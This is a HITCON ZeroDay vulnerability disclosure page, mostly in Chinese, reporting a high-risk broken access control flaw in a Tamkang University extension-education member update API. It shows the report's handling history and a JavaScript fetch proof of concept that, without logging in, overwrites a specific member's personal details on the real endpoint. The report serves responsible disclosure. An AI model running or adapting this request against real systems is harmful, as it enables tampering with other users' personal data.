Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-01356
- Vendor: 淡江大學推廣教育處
- Title: 淡江大學推廣教育處 "api/member/Update" Broken Access Control
- Introduction: api/member/Update Broken Access Control
處理狀態
目前狀態
公開
Last Update : 2025/12/01
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2025/10/23 22:46:50 : 新提交 (由 yusheng 更新此狀態)
- 2025/10/23 22:47:08 : 新提交 (由 yusheng 更新此狀態)
- 2025/10/23 22:48:34 : 新提交 (由 yusheng 更新此狀態)
- 2025/10/27 16:18:35 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/11/05 13:55:53 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/11/05 13:55:53 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/11/05 13:55:53 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2025/11/13 08:23:20 : 複測申請中 (由 組織帳號 更新此狀態)
- 2025/12/01 03:00:31 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-01356
- 通報者:cat1528985 (yusheng)
- 風險:高
- 類型:存取控制缺陷 (Broken Access Control)
參考資料
攻擊者可經由該漏洞取得、修改、刪除系統中的其他使用者的資料,或連線至高權限使用者的頁面。
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
https://www.oce.tku.edu.tw/api/member/Update
敘述
重現漏洞方式
- 無須登入,即可任意修改其他使用者的個資
JavaScript PoCfetch("https://www.oce.tku.edu.tw/api/member/Update", { "headers": { "content-type": "application/json", }, "body": JSON.stringify({ "MemberID": "012929", "FullName": "helloworld", "EngName": "helloworld", "Gender": 0, "IsMarried": 0, "Birthdate": "1911-01-01", "Phone": "", "ContactTel": "", "OtherContactTel": "", "FaxTel": "", "FullAddress": "", "ImageFileName": "", "Highest_Education": 0, "GraduateSchool": "", "GraduateYear": 0, "GraduateMonth": 0, "TeachingCertificate": "", "WorkSchools": "", "AppointmentStartTime": "", "AppointmentEndTime": "", "CompanyName": "", "CompanyTel": "", "CompanyAddr": "", "CompanyUnifiedNum": "", "MemberExperience": [] }), "method": "POST", "mode": "cors", "credentials": "omit" });
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。